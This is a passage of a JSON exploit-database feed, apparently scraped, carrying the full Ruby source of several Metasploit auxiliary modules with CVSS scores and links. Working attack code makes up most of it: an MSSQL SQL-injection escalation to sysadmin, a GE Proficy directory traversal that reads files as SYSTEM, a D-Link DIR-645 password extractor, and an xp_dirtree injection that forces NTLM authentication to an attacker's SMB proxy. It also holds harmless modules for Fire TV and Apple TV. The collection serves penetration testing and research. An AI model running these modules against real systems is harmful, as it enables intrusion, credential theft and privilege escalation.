end\n\n ver\n end\nend\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb"}, {"lastseen": "2019-11-27T19:22:14", "bulletinFamily": "exploit", "description": "This module acts as a simple remote control for the Amazon Fire TV's YouTube app. Tested on the Amazon Fire TV Stick.\n", "modified": "2017-07-24T13:26:21", "published": "2015-02-17T11:44:04", "id": "MSF:AUXILIARY/ADMIN/FIRETV/FIRETV_YOUTUBE", "href": "", "type": "metasploit", "title": "Amazon Fire TV YouTube Remote Control", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Amazon Fire TV YouTube Remote Control',\n 'Description' => %q{\n This module acts as a simple remote control for the Amazon Fire TV's\n YouTube app.\n\n Tested on the Amazon Fire TV Stick.\n },\n 'Author' => ['wvu'],\n 'References' => [\n ['URL', 'http://www.amazon.com/dp/B00CX5P8FC?_encoding=UTF8&showFS=1'],\n ['URL', 'http://www.amazon.com/dp/B00GDQ0RMG/ref=fs_ftvs']\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Play', 'Description' => 'Play video'],\n ['Stop', 'Description' => 'Stop video']\n ],\n 'DefaultAction' => 'Play'\n ))\n\n register_options([\n Opt::RPORT(8008),\n OptString.new('VID', [true, 'Video ID', 'kxopViU98Xo'])\n ])\n end\n\n def run\n case action.name\n when 'Play'\n stop\n sleep(1)\n res = play\n when 'Stop'\n res = stop\n end\n\n return unless res\n\n case res.code\n when 201\n print_good(\"Playing https://www.youtube.com/watch?v=#{datastore['VID']}\")\n when 200\n print_status('Stopping video')\n when 404\n print_error(\"Couldn't #{action.name.downcase} video\")\n end\n end\n\n def play\n begin\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => '/apps/YouTube',\n 'ctype' => 'text/plain',\n 'vars_post' => {\n 
'v' => datastore['VID']\n }\n )\n rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,\n Rex::HostUnreachable => e\n fail_with(Failure::Unreachable, e)\n end\n end\n\n def stop\n begin\n send_request_raw(\n 'method' => 'DELETE',\n 'uri' => '/apps/YouTube/run'\n )\n rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,\n Rex::HostUnreachable => e\n fail_with(Failure::Unreachable, e)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/firetv/firetv_youtube.rb"}, {"lastseen": "2019-11-23T05:31:22", "bulletinFamily": "exploit", "description": "This module can be used escalate privileges if the IMPERSONATION privilege has been assigned to the user via error based SQL injection. In most cases, this results in additional data access, but in some cases it can be used to gain sysadmin privileges. The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--\n", "modified": "2017-07-24T13:26:21", "published": "2014-11-12T15:26:47", "id": "MSF:AUXILIARY/ADMIN/MSSQL/MSSQL_ESCALATE_EXECUTE_AS_SQLI", "href": "", "type": "metasploit", "title": "Microsoft SQL Server SQLi Escalate Execute AS", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/mssql_commands'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::MSSQL_SQLI\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft SQL Server SQLi Escalate Execute AS',\n 'Description' => %q{\n This module can be used escalate privileges if the IMPERSONATION privilege has been\n assigned to the user via error based SQL injection. 
In most cases, this results in\n additional data access, but in some cases it can be used to gain sysadmin privileges.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--\n },\n 'Author' => ['nullbind <scott.sutherland[at]netspi.com>'],\n 'License' => MSF_LICENSE,\n 'References' => [['URL','http://msdn.microsoft.com/en-us/library/ms178640.aspx']]\n ))\n end\n\n def run\n # Get the database user name\n print_status(\"Grabbing the database user name...\")\n db_user = get_username\n if db_user.nil?\n print_error(\"Unable to grab user name...\")\n return\n else\n print_good(\"Database user: #{db_user}\")\n end\n\n # Grab sysadmin status\n print_status(\"Checking if #{db_user} is already a sysadmin...\")\n admin_status = check_sysadmin\n\n if admin_status.nil?\n print_error(\"Couldn't retrieve user status, aborting...\")\n return\n elsif admin_status == '1'\n print_error(\"#{db_user} is already a sysadmin, no escalation needed.\")\n return\n else\n print_status(\"#{db_user} is NOT a sysadmin, let's try to escalate privileges.\")\n end\n\n # Get list of users that can be impersonated\n print_status(\"Enumerating a list of users that can be impersonated...\")\n imp_user_list = check_imp_users\n if imp_user_list.nil? 
|| imp_user_list.empty?\n print_error(\"Sorry, the current user doesnt have permissions to impersonate anyone.\")\n return\n else\n # Display list of users that can be impersonated\n print_good(\"#{imp_user_list.length} users can be impersonated:\")\n imp_user_list.each do |dbuser|\n print_status(\" #{dbuser}\")\n end\n end\n\n # Check if any of the users that can be impersonated are sysadmins\n print_status(\"Checking if any of them are sysadmins...\")\n imp_user_sysadmin = check_imp_sysadmin(imp_user_list)\n if imp_user_sysadmin.nil?\n print_error(\"Sorry, none of the users that can be impersonated are sysadmins.\")\n return\n end\n\n # Attempt to escalate to sysadmin\n print_status(\"Attempting to impersonate #{imp_user_sysadmin}...\")\n escalate_privs(imp_user_sysadmin,db_user)\n\n admin_status = check_sysadmin\n if admin_status && admin_status == '1'\n print_good(\"Success! #{db_user} is now a sysadmin!\")\n else\n print_error(\"Fail buckets, something went wrong.\")\n end\n end\n\n def get_username\n # Setup query to check for database username\n clue_start = Rex::Text.rand_text_alpha(8 + rand(4))\n clue_end = Rex::Text.rand_text_alpha(8 + rand(4))\n sql = \"(select '#{clue_start}'+SYSTEM_USER+'#{clue_end}')\"\n\n # Run query\n result = mssql_query(sql)\n\n # Parse result\n if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/\n user_name = $1\n else\n user_name = nil\n end\n\n user_name\n end\n\n def check_sysadmin\n # Setup query to check for sysadmin\n clue_start = Rex::Text.rand_text_alpha(8 + rand(4))\n clue_end = Rex::Text.rand_text_alpha(8 + rand(4))\n sql = \"(select '#{clue_start}'+cast((select is_srvrolemember('sysadmin'))as varchar)+'#{clue_end}')\"\n\n # Run query\n result = mssql_query(sql)\n\n # Parse result\n if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/\n status = $1\n else\n status = nil\n end\n\n status\n end\n\n def check_imp_users\n # Setup query to check for trusted databases owned by 
sysadmins\n clue_start = Rex::Text.rand_text_alpha(8 + rand(4))\n clue_end = Rex::Text.rand_text_alpha(8 + rand(4))\n\n # Setup query\n sql = \"(select cast((SELECT DISTINCT '#{clue_start}'+b.name+'#{clue_end}'\n FROM sys.server_permissions a\n INNER JOIN sys.server_principals b\n ON a.grantor_principal_id = b.principal_id\n WHERE a.permission_name = 'IMPERSONATE' for xml path('')) as int))\"\n\n # Run query\n res = mssql_query(sql)\n\n unless res && res.body\n return nil\n end\n\n #Parse results\n parsed_result = res.body.scan(/#{clue_start}(.*?)#{clue_end}/m)\n\n if parsed_result && !parsed_result.empty?\n parsed_result.flatten!\n parsed_result.uniq!\n end\n\n parsed_result\n end\n\n def check_imp_sysadmin(imp_user_list)\n # Check if the user has the db_owner role is any databases\n imp_user_list.each do |imp_user|\n # Setup query\n clue_start = Rex::Text.rand_text_alpha(8 + rand(4))\n clue_end = Rex::Text.rand_text_alpha(8 + rand(4))\n\n sql = \"(select '#{clue_start}'+cast((select is_srvrolemember('sysadmin','#{imp_user}'))as varchar)+'#{clue_end}')\"\n\n # Run query\n result = mssql_query(sql)\n\n unless result && result.body\n next\n end\n\n #Parse results\n parsed_result = result.body.scan(/#{clue_start}(.*?)#{clue_end}/m)\n\n if parsed_result && !parsed_result.empty?\n parsed_result.flatten!\n parsed_result.uniq!\n end\n\n # check if user is a sysadmin\n if parsed_result && parsed_result[0] == '1'\n print_good(\" #{imp_user} is a sysadmin!\")\n return imp_user\n else\n print_status(\" #{imp_user} is NOT a sysadmin\")\n end\n end\n\n nil\n end\n\n # Attempt to escalate privileges\n def escalate_privs(db_user)\n\n # Setup Query - Impersonate the first sysadmin user on the list\n evil_sql = \"1;EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember '#{db_user}','sysadmin';Revert;--\"\n\n # Execute Query\n mssql_query(evil_sql)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb"}, {"lastseen": "2019-11-22T17:14:51", "bulletinFamily": "exploit", "description": "This module will show an image on an AppleTV device for a period of time. Some AppleTV devices are actually password-protected, in that case please set the PASSWORD datastore option. For password brute forcing, please see the module auxiliary/scanner/http/appletv_login.\n", "modified": "2017-07-24T13:26:21", "published": "2014-08-25T20:24:41", "id": "MSF:AUXILIARY/ADMIN/APPLETV/APPLETV_DISPLAY_IMAGE", "href": "", "type": "metasploit", "title": "Apple TV Image Remote Control", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apple TV Image Remote Control',\n 'Description' => %q(\n This module will show an image on an AppleTV device for a period of time.\n Some AppleTV devices are actually password-protected, in that case please\n set the PASSWORD datastore option. 
For password brute forcing, please see\n the module auxiliary/scanner/http/appletv_login.\n ),\n 'Author' =>\n [\n '0a29406d9794e4f9b30b3c5d6702c708', # Original work\n 'sinn3r' # You can blame me for mistakes\n ],\n 'References' =>\n [\n ['URL', 'http://nto.github.io/AirPlay.html']\n ],\n 'DefaultOptions' => { 'HttpUsername' => 'AirPlay' },\n 'License' => MSF_LICENSE\n ))\n\n # Make the PASSWORD option more visible and hope the user is more aware of this option\n register_options([\n Opt::RPORT(7000),\n OptInt.new('TIME', [true, 'Time in seconds to show the image', 10]),\n OptPath.new('FILE', [true, 'Image to upload and show']),\n OptString.new('HttpPassword', [false, 'The password for AppleTV AirPlay'])\n ])\n\n # We're not actually using any of these against AppleTV in our Rex HTTP client init,\n # so deregister them so we don't overwhelm the user with fake options.\n deregister_options(\n 'HTTP::uri_encode_mode', 'HTTP::uri_full_url', 'HTTP::pad_method_uri_count',\n 'HTTP::pad_uri_version_count', 'HTTP::pad_method_uri_type', 'HTTP::pad_uri_version_type',\n 'HTTP::method_random_valid', 'HTTP::method_random_invalid', 'HTTP::method_random_case',\n 'HTTP::uri_dir_self_reference', 'HTTP::uri_dir_fake_relative', 'HTTP::uri_use_backslashes',\n 'HTTP::pad_fake_headers', 'HTTP::pad_fake_headers_count', 'HTTP::pad_get_params',\n 'HTTP::pad_get_params_count', 'HTTP::pad_post_params', 'HTTP::pad_post_params_count',\n 'HTTP::uri_fake_end', 'HTTP::uri_fake_params_start', 'HTTP::header_folding',\n 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2', 'NTLM::SendLM', 'NTLM::SendNTLM',\n 'NTLM::SendSPN', 'NTLM::UseLMKey', 'DOMAIN', 'DigestAuthIIS', 'VHOST'\n )\n end\n\n\n #\n # Sends an image request to AppleTV. 
HttpClient isn't used because we actually need to keep\n # the connection alive so that the video can keep playing.\n #\n def send_image_request(opts)\n http = nil\n\n http = Rex::Proto::Http::Client.new(\n rhost,\n rport.to_i,\n {\n 'Msf' => framework,\n 'MsfExploit' => self\n },\n ssl,\n ssl_version,\n proxies,\n datastore['HttpUsername'],\n datastore['HttpPassword']\n )\n add_socket(http)\n\n http.set_config('agent' => datastore['UserAgent'])\n\n req = http.request_raw(opts)\n res = http.send_recv(req)\n\n Rex.sleep(datastore['TIME']) if res.code == 200\n http.close\n\n res\n end\n\n\n def get_image_data\n File.open(datastore['FILE'], 'rb') { |f| f.read(f.stat.size) }\n end\n\n\n def show_image\n image = get_image_data\n\n opts = {\n 'method' => 'PUT',\n 'uri' => '/photo',\n 'data' => image\n }\n\n res = send_image_request(opts)\n\n if !res\n print_status(\"The connection timed out\")\n elsif res.code == 200\n print_status(\"Received HTTP 200\")\n else\n print_error(\"The request failed due to an unknown reason\")\n end\n end\n\n\n def run\n print_status(\"Image request sent. Duration set: #{datastore['TIME']} seconds\")\n show_image\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/appletv/appletv_display_image.rb"}, {"lastseen": "2019-12-01T23:03:03", "bulletinFamily": "exploit", "description": "This module abuses a directory traversal in GE Proficy Cimplicity, specifically on the gefebt.exe component used by the WebView, in order to retrieve arbitrary files with SYSTEM privileges. 
This module has been tested successfully on GE Proficy Cimplicity 7.5.\n", "modified": "2017-07-24T13:26:21", "published": "2013-09-06T17:42:34", "id": "MSF:AUXILIARY/ADMIN/SCADA/GE_PROFICY_SUBSTITUTE_TRAVERSAL", "href": "", "type": "metasploit", "title": "GE Proficy Cimplicity WebView substitute.bcl Directory Traversal", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'uri'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'GE Proficy Cimplicity WebView substitute.bcl Directory Traversal',\n 'Description' => %q{\n This module abuses a directory traversal in GE Proficy Cimplicity, specifically on the\n gefebt.exe component used by the WebView, in order to retrieve arbitrary files with SYSTEM\n privileges. This module has been tested successfully on GE Proficy Cimplicity 7.5.\n },\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2013-0653' ],\n [ 'OSVDB', '89490' ],\n [ 'BID', '57505' ],\n [ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-13-022-02' ]\n ],\n 'DisclosureDate' => 'Jan 22 2013'))\n\n register_options(\n [\n Opt::RPORT(80),\n OptString.new('TARGETURI',[true, 'Path to CimWeb', '/CimWeb']),\n OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\\\win.ini']),\n # By default gefebt.exe installed on C:\\Program Files\\GE Fanuc\\Proficy CIMPLICITY\\WebPages\\CimWeb\n OptInt.new('DEPTH', [true, 'Traversal depth', 5])\n ])\n end\n\n def normalize_uri(*strs)\n new_str = strs * \"/\"\n\n new_str = new_str.gsub!(\"//\", \"/\") while new_str.index(\"//\")\n\n # Makes sure there's a starting slash\n unless new_str[0,1] == '/'\n new_str = '/' + new_str\n end\n\n new_str\n end\n\n 
def target_uri\n begin\n # In case TARGETURI is empty, at least we default to '/'\n u = datastore['TARGETURI']\n u = \"/\" if u.nil? or u.empty?\n URI(u)\n rescue ::URI::InvalidURIError\n print_error \"Invalid URI: #{datastore['TARGETURI'].inspect}\"\n raise Msf::OptionValidateError.new(['TARGETURI'])\n end\n end\n\n def my_basename(filename)\n return ::File.basename(filename.gsub(/\\\\/, \"/\"))\n end\n\n def is_proficy?\n connect\n req = \"GET #{normalize_uri(target_uri.path, \"index.html\")} HTTP/1.0\\r\\n\\r\\n\"\n sock.put(req)\n res = sock.get_once\n disconnect\n\n if res and res =~ /gefebt\\.exe/\n return true\n else\n return false\n end\n end\n\n # We can't use the http client msf mixin because the Proficy Web server\n # return a malformed HTTP response with the file contents, there aren't\n # two new lines (but one) between the HTTP headers and the body content.\n def read_file(file)\n travs = \"\"\n travs << \"../\" * datastore['DEPTH']\n travs << file\n\n print_status(\"#{@peer} - Retrieving file contents...\")\n\n connect\n req = \"GET #{normalize_uri(target_uri.path, \"gefebt.exe\")}?substitute.bcl+FILE=#{travs} HTTP/1.0\\r\\n\\r\\n\"\n sock.put(req)\n res = sock.get_once\n disconnect\n\n if res and res =~ /HTTP\\/1\\.0 200 OK/\n return res\n else\n return nil\n end\n\n end\n\n def run\n @peer = \"#{rhost}:#{rport}\"\n\n print_status(\"#{@peer} - Checking if it's a GE Proficy Application...\")\n if is_proficy?\n print_good(\"#{@peer} - Check successful\")\n else\n print_error(\"#{@peer} - GE proficy not found\")\n return\n end\n\n contents = read_file(datastore['FILEPATH'])\n if contents.nil?\n print_error(\"#{@peer} - File not downloaded\")\n return\n end\n\n file_name = my_basename(datastore['FILEPATH'])\n path = store_loot(\n 'ge.proficy.traversal',\n 'application/octet-stream',\n rhost,\n contents,\n file_name\n )\n print_good(\"#{rhost}:#{rport} - File saved in: #{path}\")\n\n end\nend\n", "cvss": {"score": 4.3, "vector": 
"AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb"}, {"lastseen": "2019-11-14T14:06:39", "bulletinFamily": "exploit", "description": "This module exploits an authentication bypass vulnerability in DIR 645 < v1.03. With this vulnerability you are able to extract the password for the remote management.\n", "modified": "2017-10-09T22:06:05", "published": "2013-03-24T10:44:24", "id": "MSF:AUXILIARY/ADMIN/HTTP/DLINK_DIR_645_PASSWORD_EXTRACTOR", "href": "", "type": "metasploit", "title": "D-Link DIR 645 Password Extractor", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'D-Link DIR 645 Password Extractor',\n 'Description' => %q{\n This module exploits an authentication bypass vulnerability in DIR 645 < v1.03.\n With this vulnerability you are able to extract the password for the remote\n management.\n },\n 'References' =>\n [\n [ 'OSVDB', '90733' ],\n [ 'BID', '58231' ],\n [ 'PACKETSTORM', '120591' ]\n ],\n 'Author' =>\n [\n 'Roberto Paleari <roberto[at]greyhats.it>', # Vulnerability discovery\n 'Michael Messner <devnull[at]s3cur1ty.de>'\t # Metasploit module\n ],\n 'License' => MSF_LICENSE\n )\n end\n\n def run\n\n vprint_status(\"#{rhost}:#{rport} - Trying to access the configuration of the device\")\n\n #Curl request:\n #curl -d SERVICES=DEVICE.ACCOUNT http://192.168.178.200/getcfg.php | egrep \"\\<name|password\"\n\n #download configuration\n begin\n res = send_request_cgi({\n 'uri' => '/getcfg.php',\n 'method' => 'POST',\n 'vars_post' =>\n {\n 'SERVICES' => 'DEVICE.ACCOUNT'\n }\n })\n\n return if res.nil?\n return if (res.headers['Server'].nil? 
or res.headers['Server'] !~ /DIR-645 Ver 1\\.0/)\n return if (res.code == 404)\n\n if res.body =~ /<password>(.*)<\\/password>/\n print_good(\"#{rhost}:#{rport} - credentials successfully extracted\")\n\n #store all details as loot -> there is some usefull stuff in the response\n loot = store_loot(\"dlink.dir645.config\",\"text/plain\",rhost, res.body)\n print_good(\"#{rhost}:#{rport} - Account details downloaded to: #{loot}\")\n\n res.body.each_line do |line|\n if line =~ /<name>(.*)<\\/name>/\n @user = $1\n next\n end\n if line =~ /<password>(.*)<\\/password>/\n pass = $1\n vprint_good(\"user: #{@user}\")\n vprint_good(\"pass: #{pass}\")\n\n\n connection_details = {\n module_fullname: self.fullname,\n username: @user,\n private_data: pass,\n private_type: :password,\n workspace_id: myworkspace_id,\n proof: line,\n last_attempted_at: DateTime.now, # kept in refactor may not be valid, obtained but do not attempted here\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(service_details)\n create_credential_and_login(connection_details)\n\n report_cred(\n ip: rhost,\n port: rport,\n service_name: 'http',\n user: @user,\n password: pass,\n proof: line\n )\n end\n end\n end\n rescue ::Rex::ConnectionError\n vprint_error(\"#{rhost}:#{rport} - Failed to connect to the web server\")\n return\n end\n\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb"}, {"lastseen": "2019-11-30T16:32:14", "bulletinFamily": "exploit", "description": "This module can be used to help capture or relay the LM/NTLM credentials of the account running the remote SQL Server service. The module will use the SQL injection from GET_PATH to connect to the target SQL Server instance and execute the native \"xp_dirtree\" or stored procedure. 
The stored procedures will then force the service account to authenticate to the system defined in the SMBProxy option. In order for the attack to be successful, the SMB capture or relay module must be running on the system defined as the SMBProxy. The database account used to connect to the database should only require the \"PUBLIC\" role to execute. Successful execution of this attack usually results in local administrative access to the Windows system. Specifically, this works great for relaying credentials between two SQL Servers using a shared service account to get shells. However, if the relay fails, then the LM hash can be reversed using the Halflm rainbow tables and john the ripper.\n", "modified": "2019-09-23T14:29:38", "published": "2012-10-16T19:26:10", "id": "MSF:AUXILIARY/ADMIN/MSSQL/MSSQL_NTLM_STEALER_SQLI", "href": "", "type": "metasploit", "title": "Microsoft SQL Server SQLi NTLM Stealer", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::MSSQL_SQLI\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft SQL Server SQLi NTLM Stealer',\n 'Description' => %q{\n This module can be used to help capture or relay the LM/NTLM credentials of the\n account running the remote SQL Server service. The module will use the SQL\n injection from GET_PATH to connect to the target SQL Server instance and execute\n the native \"xp_dirtree\" or stored procedure. The stored procedures will then\n force the service account to authenticate to the system defined in the SMBProxy\n option. In order for the attack to be successful, the SMB capture or relay module\n must be running on the system defined as the SMBProxy. 
The database account used to\n connect to the database should only require the \"PUBLIC\" role to execute.\n Successful execution of this attack usually results in local administrative access\n to the Windows system. Specifically, this works great for relaying credentials\n between two SQL Servers using a shared service account to get shells. However, if\n the relay fails, then the LM hash can be reversed using the Halflm rainbow tables\n and john the ripper.\n },\n 'Author' =>\n [\n 'nullbind <scott.sutherland[at]netspi.com>',\n 'Antti <antti.rantasaari[at]netspi.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]]\n ))\n\n register_options(\n [\n OptString.new('SMBPROXY', [ true, 'IP of SMB proxy or sniffer.', '0.0.0.0']),\n ])\n end\n\n def run\n\n # Reminder\n print_status(\"DONT FORGET to run a SMB capture or relay module!\")\n\n # Generate random file name\n rand_filename = Rex::Text.rand_text_alpha(8, bad='')\n\n # Setup query - double escaping backslashes\n sql = \"exec master..xp_dirtree '\\\\\\\\\\\\\\\\#{datastore['SMBPROXY']}\\\\#{rand_filename}'\"\n print_status(\"Attempting to force backend DB to authenticate to the #{datastore['SMBPROXY']}\")\n\n # Execute query to force authentation from backend database to smbproxy\n mssql_query(sql)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb"}, {"lastseen": "2019-11-13T17:25:54", "bulletinFamily": "exploit", "description": "This module will allow for multiple SQL queries contained within a specified file to be executed against a Microsoft SQL (MSSQL) Server instance, given the appropriate credentials.\n", "modified": "2017-08-25T01:38:44", "published": "2012-07-17T13:36:02", "id": "MSF:AUXILIARY/ADMIN/MSSQL/MSSQL_SQL_FILE", "href": "", "type": "metasploit", "title": "Microsoft SQL Server Generic Query from File", 
"sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::MSSQL\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft SQL Server Generic Query from File',\n 'Description' => %q{\n This module will allow for multiple SQL queries contained within a specified\n file to be executed against a Microsoft SQL (MSSQL) Server instance, given\n the appropriate credentials.\n },\n 'Author' => [ 'j0hn__f : <jf[at]tinternet.org.uk>' ],\n 'License' => MSF_LICENSE\n ))\n\n register_options(\n [\n OptPath.new('SQL_FILE', [ true, \"File containing multiple SQL queries execute (one per line)\"]),\n OptString.new('QUERY_PREFIX', [ false, \"string to append each line of the file\",\"\"]),\n OptString.new('QUERY_SUFFIX', [ false, \"string to prepend each line of the file\",\"\"])\n ])\n end\n\n\n def run\n queries = File.readlines(datastore['SQL_FILE'])\n\n prefix = datastore['QUERY_PREFIX']\n suffix = datastore['QUERY_SUFFIX']\n\n begin\n queries.each do |sql_query|\n vprint_status(\"Executing: #{sql_query}\")\n mssql_query(prefix+sql_query.chomp+suffix,true) if mssql_login_datastore\n end\n rescue Rex::ConnectionRefused, Rex::ConnectionTimeout\n print_error \"Error connecting to server: #{$!}\"\n ensure\n disconnect\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/mssql/mssql_sql_file.rb"}]}